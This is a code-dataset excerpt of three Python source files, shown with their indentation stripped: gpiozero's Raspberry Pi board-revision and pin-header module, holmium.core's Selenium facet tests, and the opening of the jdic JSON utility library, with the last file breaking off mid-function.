0x12: ('A+', '1.1', '2014Q4', 'BCM2835', 'Sony', 256, 'MicroSD', 1, 0, False, False, 1, 1, {'J8': PLUS_J8}, APLUS_BOARD, ),
0x13: ('B+', '1.2', '2015Q1', 'BCM2835', 'Egoman', 512, 'MicroSD', 4, 1, False, False, 1, 1, {'J8': PLUS_J8}, BPLUS_BOARD, ),
0x14: ('CM', '1.1', '2014Q2', 'BCM2835', 'Embest', 512, 'eMMC', 1, 0, False, False, 2, 2, {'SODIMM': CM_SODIMM}, CM_BOARD, ),
0x15: ('A+', '1.1', '2014Q4', 'BCM2835', 'Embest', 256, 'MicroSD', 1, 0, False, False, 1, 1, {'J8': PLUS_J8}, APLUS_BOARD, ),
}
# ANSI color codes, for the pretty printers (nothing comprehensive, just enough
# for our purposes)
class Style(object):
def __init__(self, color=None):
self.color = self._term_supports_color() if color is None else bool(color)
self.effects = {
'reset': 0,
'bold': 1,
'normal': 22,
}
self.colors = {
'black': 0,
'red': 1,
'green': 2,
'yellow': 3,
'blue': 4,
'magenta': 5,
'cyan': 6,
'white': 7,
'default': 9,
}
@staticmethod
def _term_supports_color():
try:
stdout_fd = sys.stdout.fileno()
except IOError:
return False
else:
is_a_tty = os.isatty(stdout_fd)
is_windows = sys.platform.startswith('win')
return is_a_tty and not is_windows
@classmethod
def from_style_content(cls, format_spec):
specs = set(format_spec.split())
style = specs & {'mono', 'color'}
content = specs - style
if len(style) > 1:
raise ValueError('cannot specify both mono and color styles')
try:
style = style.pop()
except KeyError:
style = 'color' if cls._term_supports_color() else 'mono'
if len(content) > 1:
raise ValueError('cannot specify more than one content element')
try:
content = content.pop()
except KeyError:
content = 'full'
return cls(style == 'color'), content
def __call__(self, format_spec):
specs = format_spec.split()
codes = []
fore = True
for spec in specs:
if spec == 'on':
fore = False
else:
try:
codes.append(self.effects[spec])
except KeyError:
try:
if fore:
codes.append(30 + self.colors[spec])
else:
codes.append(40 + self.colors[spec])
except KeyError:
raise ValueError('invalid format specification "%s"' % spec)
if self.color:
return '\x1b[%sm' % (';'.join(str(code) for code in codes))
else:
return ''
def __format__(self, format_spec):
if format_spec == '':
return 'color' if self.color else 'mono'
else:
return self(format_spec)
class PinInfo(namedtuple('PinInfo', (
'number',
'function',
'pull_up',
'row',
'col',
))):
"""
This class is a :func:`~collections.namedtuple` derivative used to
represent information about a pin present on a GPIO header. The following
attributes are defined:
.. attribute:: number
An integer containing the physical pin number on the header (starting
from 1 in accordance with convention).
.. attribute:: function
A string describing the function of the pin. Some common examples
include "GND" (for pins connecting to ground), "3V3" (for pins which
output 3.3 volts), "GPIO9" (for GPIO9 in the Broadcom numbering
scheme), etc.
.. attribute:: pull_up
A bool indicating whether the pin has a physical pull-up resistor
permanently attached (this is usually ``False`` but GPIO2 and GPIO3
are *usually* ``True``). This is used internally by gpiozero to raise
errors when pull-down is requested on a pin with a physical pull-up
resistor.
.. attribute:: row
An integer indicating on which row the pin is physically located in
the header (1-based)
.. attribute:: col
An integer indicating in which column the pin is physically located
in the header (1-based)
"""
__slots__ = () # workaround python issue #24931
class HeaderInfo(namedtuple('HeaderInfo', (
'name',
'rows',
'columns',
'pins',
))):
"""
This class is a :func:`~collections.namedtuple` derivative used to
represent information about a pin header on a board. The object can be used
in a format string with various custom specifications::
from gpiozero import *
print('{0}'.format(pi_info().headers['J8']))
print('{0:full}'.format(pi_info().headers['J8']))
print('{0:col2}'.format(pi_info().headers['P1']))
print('{0:row1}'.format(pi_info().headers['P1']))
`'color'` and `'mono'` can be prefixed to format specifications to force
the use of `ANSI color codes`_. If neither is specified, ANSI codes will
only be used if stdout is detected to be a tty::
print('{0:color row2}'.format(pi_info().headers['J8'])) # force use of ANSI codes
print('{0:mono row2}'.format(pi_info().headers['P1'])) # force plain ASCII
The following attributes are defined:
.. automethod:: pprint
.. attribute:: name
The name of the header, typically as it appears silk-screened on the
board (e.g. "P1" or "J8").
.. attribute:: rows
The number of rows on the header.
.. attribute:: columns
The number of columns on the header.
.. attribute:: pins
A dictionary mapping physical pin numbers to :class:`PinInfo` tuples.
.. _ANSI color codes: https://en.wikipedia.org/wiki/ANSI_escape_code
"""
__slots__ = () # workaround python issue #24931
def _func_style(self, function, style):
if function == V5:
return style('bold red')
elif function in (V3_3, V1_8):
return style('bold cyan')
elif function in (GND, NC):
return style('bold black')
elif function.startswith('GPIO') and function[4:].isdigit():
return style('bold green')
else:
return style('yellow')
def _format_full(self, style):
Cell = namedtuple('Cell', ('content', 'align', 'style'))
lines = []
for row in range(self.rows):
line = []
for col in range(self.columns):
pin = (row * self.columns) + col + 1
try:
pin = self.pins[pin]
cells = [
Cell(pin.function, '><'[col % 2], self._func_style(pin.function, style)),
Cell('(%d)' % pin.number, '><'[col % 2], ''),
]
if col % 2:
cells = reversed(cells)
line.extend(cells)
except KeyError:
line.append(Cell('', '<', ''))
lines.append(line)
cols = list(zip(*lines))
col_lens = [max(len(cell.content) for cell in col) for col in cols]
lines = [
' '.join(
'{cell.style}{cell.content:{cell.align}{width}s}{style:reset}'.format(
cell=cell, width=width, style=style)
for cell, width, align in zip(line, col_lens, cycle('><')))
for line in lines
]
return '\n'.join(lines)
def _format_pin(self, pin, style):
return ''.join((
style('on black'),
(
' ' if pin is None else
self._func_style(pin.function, style) +
('1' if pin.number == 1 else 'o')
),
style('reset')
))
def _format_row(self, row, style):
if row > self.rows:
raise ValueError('invalid row %d for header %s' % (row, self.name))
start_pin = (row - 1) * self.columns + 1
return ''.join(
self._format_pin(pin, style)
for n in range(start_pin, start_pin + self.columns)
for pin in (self.pins.get(n),)
)
def _format_col(self, col, style):
if col > self.columns:
raise ValueError('invalid col %d for header %s' % (col, self.name))
return ''.join(
self._format_pin(pin, style)
for n in range(col, self.rows * self.columns + 1, self.columns)
for pin in (self.pins.get(n),)
)
def __format__(self, format_spec):
style, content = Style.from_style_content(format_spec)
if content == 'full':
return self._format_full(style)
elif content.startswith('row') and content[3:].isdigit():
return self._format_row(int(content[3:]), style)
elif content.startswith('col') and content[3:].isdigit():
return self._format_col(int(content[3:]), style)
def pprint(self, color=None):
"""
Pretty-print a diagram of the header pins.
If *color* is ``None`` (the default, the diagram will include ANSI
color codes if stdout is a color-capable terminal). Otherwise *color*
can be set to ``True`` or ``False`` to force color or monochrome
output.
"""
print('{0:{style} full}'.format(self, style=Style(color)))
class PiBoardInfo(namedtuple('PiBoardInfo', (
'revision',
'model',
'pcb_revision',
'released',
'soc',
'manufacturer',
'memory',
'storage',
'usb',
'ethernet',
'wifi',
'bluetooth',
'csi',
'dsi',
'headers',
'board',
))):
"""
This class is a :func:`~collections.namedtuple` derivative used to
represent information about a particular model of Raspberry Pi. While it is
a tuple, it is strongly recommended that you use the following named
attributes to access the data contained within. The object can be used
in format strings with various custom format specifications::
from gpiozero import *
print('{0}'.format(pi_info()))
print('{0:full}'.format(pi_info()))
print('{0:board}'.format(pi_info()))
print('{0:specs}'.format(pi_info()))
print('{0:headers}'.format(pi_info()))
`'color'` and `'mono'` can be prefixed to format specifications to force
the use of `ANSI color codes`_. If neither is specified, ANSI codes will
only be used if stdout is detected to be a tty::
print('{0:color board}'.format(pi_info())) # force use of ANSI codes
print('{0:mono board}'.format(pi_info())) # force plain ASCII
.. _ANSI color codes: https://en.wikipedia.org/wiki/ANSI_escape_code
.. automethod:: physical_pin
.. automethod:: physical_pins
.. automethod:: pprint
.. automethod:: pulled_up
.. attribute:: revision
A string indicating the revision of the Pi. This is unique to each
revision and can be considered the "key" from which all other
attributes are derived. However, in itself the string is fairly
meaningless.
.. attribute:: model
A string containing the model of the Pi (for example, "B", "B+", "A+",
"2B", "CM" (for the Compute Module), or "Zero").
.. attribute:: pcb_revision
A string containing the PCB revision number which is silk-screened onto
the Pi (on some models).
.. note::
This is primarily useful to distinguish between the model B
revision 1.0 and 2.0 (not to be confused with the model 2B) which
had slightly different pinouts on their 26-pin GPIO headers.
.. attribute:: released
A string containing an approximate release date for this revision of
the Pi (formatted as yyyyQq, e.g. 2012Q1 means the first quarter of
2012).
.. attribute:: soc
A string indicating the SoC (`system on a chip`_) that this revision
of the Pi is based upon.
.. attribute:: manufacturer
A string indicating the name of the manufacturer (usually "Sony" but a
few others exist).
.. attribute:: memory
An integer indicating the amount of memory (in Mb) connected to the
SoC.
.. note::
This can differ substantially from the amount of RAM available
to the operating system as the GPU's memory is shared with the
CPU. When the camera module is activated, at least 128Mb of RAM
is typically reserved for the GPU.
.. attribute:: storage
A string indicating the type of bootable storage used with this
revision of Pi, e.g. "SD", "MicroSD", or "eMMC" (for the Compute
Module).
.. attribute:: usb
An integer indicating how many USB ports are physically present on
this revision of the Pi.
.. note::
This does *not* include the micro-USB port used to power the Pi.
.. attribute:: ethernet
An integer indicating how many Ethernet ports are physically present
on this revision of the Pi.
.. attribute:: wifi
A bool indicating whether this revision of the Pi has wifi built-in.
.. attribute:: bluetooth
A bool indicating whether this revision of the Pi has bluetooth
built-in.
.. attribute:: csi
An integer indicating the number of CSI (camera) ports available on
this revision of the Pi.
.. attribute:: dsi
An integer indicating the number of DSI (display) ports available on
this revision of the Pi.
.. attribute:: headers
A dictionary which maps header labels to :class:`HeaderInfo` tuples.
For example, to obtain information about header P1 you would query
``headers['P1']``. To obtain information about pin 12 on header J8 you
would query ``headers['J8'].pins[12]``.
A rendered version of this data can be obtained by using the
:class:`PiBoardInfo` object in a format string::
from gpiozero import *
print('{0:headers}'.format(pi_info()))
.. attribute:: board
An ASCII art rendition of the board, primarily intended for console
pretty-print usage. A more usefully rendered version of this data can
be obtained by using the :class:`PiBoardInfo` object in a format
string. For example::
from gpiozero import *
print('{0:board}'.format(pi_info()))
.. _system on a chip: https://en.wikipedia.org/wiki/System_on_a_chip
"""
__slots__ = () # workaround python issue #24931
@classmethod
def from_revision(cls, revision):
if revision & 0x800000:
# New-style revision, parse information from bit-pattern:
#
# MSB -----------------------> LSB
# uuuuuuuuFMMMCCCCPPPPTTTTTTTTRRRR
#
# uuuuuuuu - Unused
# F - New flag (1=valid new-style revision, 0=old-style)
# MMM - Memory size (0=256, 1=512, 2=1024)
# CCCC - Manufacturer (0=Sony, 1=Egoman, 2=Embest, 3=Sony Japan)
# PPPP - Processor (0=2835, 1=2836, 2=2837)
# TTTTTTTT - Type (0=A, 1=B, 2=A+, 3=B+, 4=2B, 5=Alpha (??), 6=CM,
# 8=3B, 9=Zero, 10=CM3, 12=Zero W)
# RRRR - Revision (0, 1, 2, etc.)
revcode_memory = (revision & 0x700000) >> 20
revcode_manufacturer = (revision & 0xf0000) >> 16
revcode_processor = (revision & 0xf000) >> 12
revcode_type = (revision & 0xff0) >> 4
revcode_revision = (revision & 0x0f)
try:
model = {
0: 'A',
1: 'B',
2: 'A+',
3: 'B+',
4: '2B',
6: 'CM',
8: '3B',
9: 'Zero',
10: 'CM3',
12: 'Zero W',
}.get(revcode_type, '???')
if model in ('A', 'B'):
pcb_revision = {
0: '1.0', # is this right?
1: '1.0',
2: '2.0',
}.get(revcode_revision, 'Unknown')
else:
pcb_revision = '1.%d' % revcode_revision
soc = {
0: 'BCM2835',
1: 'BCM2836',
2: 'BCM2837',
}.get(revcode_processor, 'Unknown')
manufacturer = {
0: 'Sony',
1: 'Egoman',
2: 'Embest',
3: 'Sony Japan',
}.get(revcode_manufacturer, 'Unknown')
memory = {
0: 256,
1: 512,
2: 1024,
}.get(revcode_memory, None)
released = {
'A': '2013Q1',
'B': '2012Q1' if pcb_revision == '1.0' else '2012Q4',
'A+': '2014Q4' if memory == 512 else '2016Q3',
'B+': '2014Q3',
'2B': '2015Q1' if pcb_revision in ('1.0', '1.1') else '2016Q3',
'CM': '2014Q2',
'3B': '2016Q1' if manufacturer in ('Sony', 'Embest') else '2016Q4',
'Zero': '2015Q4' if pcb_revision == '1.2' else '2016Q2',
'CM3': '2017Q1',
'Zero W': '2017Q1',
}.get(model, 'Unknown')
storage = {
'A': 'SD',
'B': 'SD',
'CM': 'eMMC',
'CM3': 'eMMC / off-board',
}.get(model, 'MicroSD')
usb = {
'A': 1,
'A+': 1,
'Zero': 1,
'Zero W': 1,
'B': 2,
'CM': 0,
'CM3': 1,
}.get(model, 4)
ethernet = {
'A': 0,
'A+': 0,
'Zero': 0,
'Zero W': 0,
'CM': 0,
'CM3': 0,
}.get(model, 1)
wifi = {
'3B': True,
'Zero W': True,
}.get(model, False)
bluetooth = {
'3B': True,
'Zero W': True,
}.get(model, False)
csi = {
'Zero': 0 if pcb_revision == '1.0' else 1,
'Zero W': 1,
'CM': 2,
'CM3': 2,
}.get(model, 1)
dsi = {
'Zero': 0,
'Zero W': 0,
}.get(model, csi)
headers = {
'A': {'P1': REV2_P1, 'P5': REV2_P5},
'B': {'P1': REV1_P1} if pcb_revision == '1.0' else {'P1': REV2_P1, 'P5': REV2_P5},
'CM': {'SODIMM': CM_SODIMM},
'CM3': {'SODIMM': CM3_SODIMM},
}.get(model, {'J8': PLUS_J8})
board = {
'A': A_BOARD,
'B': REV1_BOARD if pcb_revision == '1.0' else REV2_BOARD,
'A+': APLUS_BOARD,
'CM': CM_BOARD,
'CM3': CM_BOARD,
'Zero': ZERO12_BOARD if pcb_revision == '1.2' else ZERO13_BOARD,
'Zero W': ZERO13_BOARD,
}.get(model, BPLUS_BOARD)
except KeyError:
raise PinUnknownPi('unable to parse new-style revision "%x"' % revision)
else:
# Old-style revision, use the lookup table
try:
(
model,
pcb_revision,
released,
soc,
manufacturer,
memory,
storage,
usb,
ethernet,
wifi,
bluetooth,
csi,
dsi,
headers,
board,
) = PI_REVISIONS[revision]
except KeyError:
raise PinUnknownPi('unknown old-style revision "%x"' % revision)
headers = {
header: HeaderInfo(name=header, rows=max(header_data) // 2, columns=2, pins={
number: PinInfo(
number=number, function=function, pull_up=pull_up,
row=row + 1, col=col + 1)
for number, (function, pull_up) in header_data.items()
for row, col in (divmod(number, 2),)
})
for header, header_data in headers.items()
}
return cls(
'%04x' % revision,
model,
pcb_revision,
released,
soc,
manufacturer,
memory,
storage,
usb,
ethernet,
wifi,
bluetooth,
csi,
dsi,
headers,
board,
)
def physical_pins(self, function):
"""
Return the physical pins supporting the specified *function* as tuples
of ``(header, pin_number)`` where *header* is a string specifying the
header containing the *pin_number*. Note that the return value is a
:class:`set` which is not indexable. Use :func:`physical_pin` if you
are expecting a single return value.
:param str function:
The pin function you wish to search for. Usually this is something
like "GPIO9" for Broadcom GPIO pin 9, or "GND" for all the pins
connecting to electrical ground.
"""
return {
(header, pin.number)
for (header, info) in self.headers.items()
for pin in info.pins.values()
if pin.function == function
}
def physical_pin(self, function):
"""
Return the physical pin supporting the specified *function*. If no pins
support the desired *function*, this function raises :exc:`PinNoPins`.
If multiple pins support the desired *function*, :exc:`PinMultiplePins`
will be raised (use :func:`physical_pins` if you expect multiple pins
in the result, such as for electrical ground).
:param str function:
The pin function you wish to search for. Usually this is something
like "GPIO9" for Broadcom GPIO pin 9.
"""
result = self.physical_pins(function)
if len(result) > 1:
raise PinMultiplePins('multiple pins can be used for %s' % function)
elif result:
return result.pop()
else:
raise PinNoPins('no pins can be used for %s' % function)
def pulled_up(self, function):
"""
Returns a bool indicating whether a physical pull-up is attached to
the pin supporting the specified *function*. Either :exc:`PinNoPins`
or :exc:`PinMultiplePins` may be raised if the function is not
associated with a single pin.
:param str function:
The pin function you wish to determine pull-up for. Usually this is
something like "GPIO9" for Broadcom GPIO pin 9.
"""
try:
header, number = self.physical_pin(function)
except PinNoPins:
return False
else:
return self.headers[header].pins[number].pull_up
def __repr__(self):
return '{cls}({fields})'.format(
cls=self.__class__.__name__,
fields=', '.join(
(
'{name}=...' if name in ('headers', 'board') else
'{name}={value!r}').format(name=name, value=value)
for name, value in zip(self._fields, self)
)
)
def __format__(self, format_spec):
style, content = Style.from_style_content(format_spec)
if content == 'full':
return dedent("""\
{self:{style} board}
{self:{style} specs}
{self:{style} headers}"""
).format(self=self, style=style)
elif content == 'board':
kw = self._asdict()
kw.update({
name: header
for name, header in self.headers.items()
})
return self.board.format(style=style, **kw)
elif content == 'specs':
return dedent("""\
{style:bold}Revision {style:reset}: {revision}
{style:bold}SoC {style:reset}: {soc}
{style:bold}RAM {style:reset}: {memory}Mb
{style:bold}Storage {style:reset}: {storage}
{style:bold}USB ports {style:reset}: {usb} {style:yellow}(excluding power){style:reset}
{style:bold}Ethernet ports {style:reset}: {ethernet}
{style:bold}Wi-fi {style:reset}: {wifi}
{style:bold}Bluetooth {style:reset}: {bluetooth}
{style:bold}Camera ports (CSI) {style:reset}: {csi}
{style:bold}Display ports (DSI){style:reset}: {dsi}"""
).format(style=style, **self._asdict())
elif content == 'headers':
return '\n\n'.join(
dedent("""\
{style:bold}{header.name}{style:reset}:
{header:{style} full}"""
).format(header=header, style=style)
for header in sorted(self.headers.values(), key=attrgetter('name'))
)
def pprint(self, color=None):
"""
Pretty-print a representation of the board along with header diagrams.
If *color* is ``None`` (the default), the diagram will include ANSI
color codes if stdout is a color-capable terminal. Otherwise *color*
can be set to ``True`` or ``False`` to force color or monochrome
output.
"""
print('{0:{style} full}'.format(self, style=Style(color)))
def pi_info(revision=None):
"""
Returns a :class:`PiBoardInfo` instance containing information about a
*revision* of the Raspberry Pi.
:param str revision:
The revision of the Pi to return information about. If this is omitted
or ``None`` (the default), then the library will attempt to determine
the model of Pi it is running on and return information about that.
"""
if revision is None:
# The reason this import is located here is to avoid a circular
# dependency; devices->pins.local->pins.data->devices
from ..devices import Device
result = Device.pin_factory.pi_info
if result is None:
raise PinUnknownPi('The default pin_factory is not attached to a Pi')
else:
return result
else:
if isinstance(revision, bytes):
revision = revision.decode('ascii')
if isinstance(revision, str):
revision = int(revision, base=16)
else:
# be nice to people passing an int (or something numeric anyway)
revision = int(revision)
return PiBoardInfo.from_revision(revision)
| bsd-3-clause | -1,324,905,326,528,842,200 | 45.297321 | 212 | 0.501251 | false |
jlecount-sungevity/holmium.core | tests/facet_tests.py | 1 | 8107 | """
tests for facets
"""
import unittest
from flask_testing import LiveServerTestCase
import mock
from holmium.core import Page, Element, Locators, Elements, Section, ElementMap
from holmium.core.facets import FacetError, defer, title, cookie, strict
from holmium.core.pageobject import NonexistentElement
from . import webapp
from tests.utils import get_driver
class LiveTest(LiveServerTestCase):
def create_app(self):
return webapp.create_app()
def setUp(self):
super(LiveTest, self).setUp()
webapp.db.create_db()
@strict()
class NavSection(Section):
links = Elements(Locators.CSS_SELECTOR, "ul>li")
@strict()
class BadNavSectionStrict(Section):
links = Elements(Locators.CSS_SELECTOR, "ul>li")
junk = Element(Locators.CLASS_NAME, "junk")
@strict(debug=True)
class BadNavSectionStrictDebug(Section):
links = Elements(Locators.CSS_SELECTOR, "ul>li")
junk = Element(Locators.CLASS_NAME, "junk")
class BadNavSection(Section):
links = Elements(Locators.CSS_SELECTOR, "ul>bi", facet=True)
class JumboTron(Section):
callout = Element(Locators.TAG_NAME, "h1")
link = Element(Locators.CLASS_NAME, "btn")
class BasePage(Page):
nav = NavSection(Locators.CLASS_NAME, "nav")
jumbo = JumboTron(Locators.CLASS_NAME, "jumbotron")
@title(title="login")
class LoginPage(BasePage):
email = Element(Locators.NAME, "email", facet=True)
password = Element(Locators.NAME, "password", facet=True)
submit = Element(Locators.ID, "login-submit", facet=True)
def login(self, email, password):
self.email.send_keys(email)
self.password.send_keys(password)
self.submit.click()
@title(title="main page")
@cookie(name="uid")
@defer(page=LoginPage,
action=LoginPage.login,
action_arguments={"email": "[email protected]",
"password": "sekret"},
required=False)
class MainPage(BasePage):
references = ElementMap ( Locators.CLASS_NAME, "reference-link")
reference_content = Element(Locators.ID, "reference-content")
selenium = Element(Locators.LINK_TEXT, "Selenium", timeout=5)
def do_login(page, email, password):
page.login(email, password)
@title(title="main page")
@cookie(name="uid")
@defer(page=LoginPage,
action=do_login,
action_arguments={"email": "[email protected]",
"password": "sekret"},
required=True)
class MainPageWithCallable(BasePage):
references = ElementMap ( Locators.CLASS_NAME, "reference-link")
reference_content = Element(Locators.ID, "reference-content")
selenium = Element(Locators.LINK_TEXT, "Selenium", timeout=5)
class MainPageBadElement(BasePage):
bad_element = Element(Locators.NAME, "bad_element", facet=True)
class MainPageBadSectionElement(BasePage):
nav = BadNavSection(Locators.CLASS_NAME, "nav")
class MainPageMixedSection(BasePage):
bad_nav = BadNavSection(Locators.CLASS_NAME, "nav")
class FacetsTests(LiveTest):
def setUp(self):
super(FacetsTests, self).setUp()
self.driver = get_driver()
self.base_url = self.get_server_url()
def test_main_page_callout(self):
main = MainPage(self.driver, self.base_url)
self.assertEqual(main.jumbo.callout.text, "Here's a few ways it can be good")
def test_main_page_with_callable_callout(self):
main = MainPageWithCallable(self.driver, self.base_url)
self.assertEqual(main.jumbo.callout.text, "Here's a few ways it can be good")
def test_main_click_selenium(self):
main = MainPage(self.driver, self.base_url)
main.selenium.click()
self.assertTrue("Selenium automates browsers." in main.reference_content.text)
def test_main_page_login_first(self):
login = LoginPage(self.driver, self.base_url + "/login")
login.login("[email protected]", "sekret")
main = MainPage(self.driver, self.base_url)
self.assertEqual(main.jumbo.callout.text, "Here's a few ways it can be good")
def test_main_page_bad_trait_element(self):
main = MainPageBadElement(self.driver, self.base_url)
self.assertRaises(FacetError, lambda:main.jumbo)
def test_main_page_bad_section_element(self):
main = MainPageBadSectionElement(self.driver, self.base_url)
self.assertRaises(FacetError, lambda: main.nav.links)
def test_main_page_bad_section_strict(self):
class _P(MainPage):
bad_nav = BadNavSectionStrict(Locators.CLASS_NAME, "nav")
main = _P(self.driver, self.base_url)
self.assertRaises(FacetError, lambda: main.bad_nav.links)
self.assertTrue( main.nav.links is not None)
def test_main_page_bad_section_strict_debug(self):
class _P(MainPage):
bad_nav = BadNavSectionStrictDebug(Locators.CLASS_NAME, "nav")
main = _P(self.driver, self.base_url)
with mock.patch("holmium.core.facets.log") as log:
self.assertTrue( main.bad_nav.links is not None)
self.assertTrue( main.bad_nav.junk is NonexistentElement())
self.assertTrue( main.nav.links is not None)
self.assertTrue(log.warn.call_count == 1)
self.assertTrue("failed to exhibit facet junk" in str(log.warn.call_args))
def test_main_page_good_and_bad_section_element(self):
main = MainPageMixedSection(self.driver, self.base_url)
self.assertRaises(FacetError, lambda: main.bad_nav.links)
self.assertTrue( main.nav.links is not None)
def tearDown(self):
super(FacetsTests, self).tearDown()
class GoodFacetsTest(unittest.TestCase):
def test_all(self):
class Other(Page):
def do(self):
return
@title(title="title")
@cookie(name="cookie", value="yum")
@cookie(name="cookie", value=lambda c:c=="yum")
@defer(page=Other, action=Other.do)
class P(Page):
el = Element(Locators.CLASS_NAME, "null")
driver = mock.Mock()
driver.find_element.return_value.text = "null"
driver.get_cookie.return_value = "yum"
driver.title = "title"
p = P(driver)
self.assertEqual(p.el.text, "null")
class BadFacetTests(unittest.TestCase):
def test_missing_title(self):
@title(title="foo")
class P(Page):
el = Element(Locators.CLASS_NAME, "null")
driver = mock.Mock()
p = P(driver)
self.assertRaises(FacetError, lambda: p.el)
def test_failed_callable(self):
@cookie(name="foo", value=lambda c:c==1)
class P(Page):
el = Element(Locators.CLASS_NAME, "null")
driver = mock.Mock()
driver.get_cookie.return_value = 2
p = P(driver)
self.assertRaises(FacetError, lambda: p.el)
class BadReactionTests(unittest.TestCase):
def test_failed_reaction_required(self):
class Other(Page):
def do(self):
raise Exception("can't")
@defer(page=Other, action=Other.do)
class P(Page):
el = Element(Locators.CLASS_NAME, "null")
driver = mock.Mock()
p = P(driver)
self.assertRaises(FacetError, lambda: p.el)
def test_passed_reaction_notrequired(self):
class Other(Page):
def do(self):
raise Exception("can't")
@defer(page=Other, action=Other.do, required=False)
class P(Page):
el = Element(Locators.CLASS_NAME, "null")
driver = mock.Mock()
driver.find_element.return_value.text = "null"
p = P(driver)
self.assertEqual(p.el.text, "null")
def test_missing_arguments():
for args in [{}, {"page":1}, {"page":1, "action":1, "foobar":1}]:
yield check_arguments, args
def check_arguments(args):
def create(**kw):
@defer(**kw)
class P(Page):
pass
try:
create(**args)
raise Exception("exception not raised")
except AttributeError as e:
pass
| mit | 386,016,274,215,468,740 | 32.639004 | 86 | 0.63735 | false |
kerfab/jdic | jdic/jdic.py | 1 | 21228 | """
The Jdic module provides the features required to manipulate
JSON objects through a consistent API.
"""
from __future__ import unicode_literals
import json
import hashlib
import importlib
from collections import Sequence, Mapping
import json_delta
import jsonschema
from . import drivers # pylint: disable=unused-import
from . import settings
JSON_ITERABLES = [
Mapping,
Sequence
]
JSON_LEAVES = [
str,
int,
float,
bool,
type(None)
]
class MatchResult(object):
""" Wraps the results of searches and browses within Jdic objects """
# pylint: disable=too-few-public-methods
def __init__(self, **kwargs):
self._obj = {}
for k in kwargs:
setattr(self, k, kwargs[k])
self._obj[k] = kwargs[k]
def __str__(self):
return str(self._obj)
def __iter__(self):
yield from self._obj.__iter__()
def __getitem__(self, item):
return self._obj[item]
class Jdic(object):
"""
The Jdic class provides the useful operations to crawl or manipulate JSON data objects.
Do not instantiate this class directly, use the instantation wrapper function `jdic()` instead
"""
# pylint: disable=too-many-instance-attributes
_attr_whitelist = [
'count',
'index',
'copy',
'fromkeys',
'keys',
'items',
'values'
]
##
# CLASS OPERATORS
##
def __init__(self, iterable, schema=None, serializer=None, driver=None,
_parent=None, _key=None):
""" Instantiates a Generic Jdic object.
iterable: the core data to be contained within a Jdic (usually dict or list)
schema: a JSON schema which may be used for automatic validation of data
serializer: a function which might be used for custom-made data-to-JSON serialization
driver: the class which implements the driver features
_parent: used internally to attach a new Jdic to another. Within a JSON hierarchy all
iterables are Jdic objects.
_key: used internally to indicate under which key (or index) the new Jdic is attached
within its parent.
"""
# pylint: disable=protected-access
self._parent = _parent
self._key = _key
# Load / Inherit driver first
if self._parent is None:
self._driver_name = driver if driver else settings.json_path_driver
self._driver = None
else:
self._driver_name = self._parent._driver_name if driver is None else driver
self._driver = self._parent._driver if driver is None else None
if self._driver is None:
self._driver = importlib.import_module('.'+self._driver_name, 'jdic.drivers').Driver()
# Inherit parent or constructor properties
if self._parent is None:
self._path = self._driver.get_new_path()
self._serializer = serializer
self._depth = 0
else:
self._path = self._driver.add_to_path(self._parent._path, self._key)
self._serializer = self._parent._serializer if serializer is None else serializer
self._depth = self._parent._depth + 1
self._schema = schema
self._cache = {}
# Dereference or cast to strict Json
if isinstance(iterable, Jdic):
iterable = iterable._obj
self._obj = self._serialize_to_jdic(iterable, parent=self)
if self._schema:
self.validate(self._schema)
def __copy__(self):
return self.new()
def __deepcopy__(self, _):
return self.new()
def __delitem__(self, path):
# pylint: disable=protected-access
if self._driver.is_root_path(path):
if isinstance(self._obj, Mapping):
self._obj = {}
else:
self._obj = []
self._flag_modified()
return
if self._driver.is_a_path(path):
parents = self._driver.get_parent(self._obj, path)
else:
parents = [(self, path)]
for parent, key in parents:
del parent._obj[key]
parent._flag_modified()
def __eq__(self, obj):
if isinstance(obj, Jdic):
return self.checksum() == obj.checksum()
elif self._is_iterable(obj):
return self.checksum() == jdic_create(obj).checksum()
return False
def __getattr__(self, attr):
attr = getattr(self._obj, attr)
if attr not in self._attr_whitelist:
self._flag_modified()
return attr
def __getitem__(self, item):
if self._driver.is_root_path(item):
return self
if self._driver.is_a_path(item):
return self._driver.get_value_at_path(self._obj, item)
if isinstance(self._obj, Mapping):
return self._obj[str(item)]
return self._obj[int(item)]
def __iter__(self):
yield from self._obj.__iter__()
def __len__(self):
return len(self._obj)
def __setitem__(self, path, value):
# pylint: disable=protected-access
if self._driver.is_root_path(path):
if not self._is_iterable(value):
raise ValueError('Cannot reassign object to non iterable "{}"'.format(type(value)))
self._jdic_reload(value)
if self._driver.is_a_path(path):
parents = self._driver.get_parent(self._obj, path)
else:
parents = [(self, path)]
for parent, key in parents:
if self._is_iterable(value):
value = jdic_create(value, _parent=parent, _key=key)
parent._obj[key] = value
parent._flag_modified()
def __str__(self):
return self.json(sort_keys=settings.json_dump_sort_keys,
indent=settings.json_dump_indent, ensure_ascii=False)
__repr__ = __str__
##
# UNDERLYING FUNCTIONS
##
def _flag_modified(self):
# pylint: disable=protected-access
self._cache = {}
if self._parent is not None:
self._parent._flag_modified()
if self._schema:
self.validate(self._schema)
def _input_serialize(self, obj):
if self._serializer:
obj = self._serializer(obj)
elif callable(settings.serialize_custom_function):
# pylint: disable=not-callable
obj = settings.serialize_custom_function(obj)
if isinstance(obj, float) and settings.serialize_float_to_int and int(obj) == obj:
return int(obj)
if self._is_json_leaf(obj):
return obj
if isinstance(obj, Mapping):
return dict(obj)
elif isinstance(obj, Sequence):
return list(obj)
return str(obj)
def _is_iterable(self, obj):
if self._is_json_leaf(obj):
return False
for itype in JSON_ITERABLES:
if isinstance(obj, itype):
return True
return False
@staticmethod
def _is_json_leaf(obj):
""" True for int, float, str, bool, None """
for ltype in JSON_LEAVES:
if isinstance(obj, ltype):
return True
return False
@staticmethod
def _is_limit_reached(number, limit):
""" Helper function """
if limit is None:
return False
if limit < 0:
return False
if limit >= number:
return True
def _jdic_reload(self, obj):
# pylint: disable=protected-access
if isinstance(obj, Jdic):
obj = obj._obj
self._obj = self._serialize_to_jdic(obj, parent=self)
self._flag_modified()
@staticmethod
def _keys_in(obj, keys, mode):
""" Helper function """
if not isinstance(obj, Mapping):
return False
if mode == "any":
for key in keys:
if key in obj:
return True
return False
elif mode == "all":
for key in keys:
if key not in obj:
return False
return True
raise NotImplementedError(mode)
def _match(self, obj, query):
return self._driver.match(obj, query)
def _merge(self, obj, with_obj, arr_mode="replace"):
# pylint: disable=protected-access
if isinstance(obj, Jdic):
obj = obj._obj
if isinstance(with_obj, Jdic):
with_obj = with_obj._obj
if not self._is_iterable(obj) or not self._is_iterable(with_obj):
raise TypeError('Cannot merge {} with {}'.format(type(obj), type(with_obj)))
unique_t = self._unique_type(obj, with_obj)
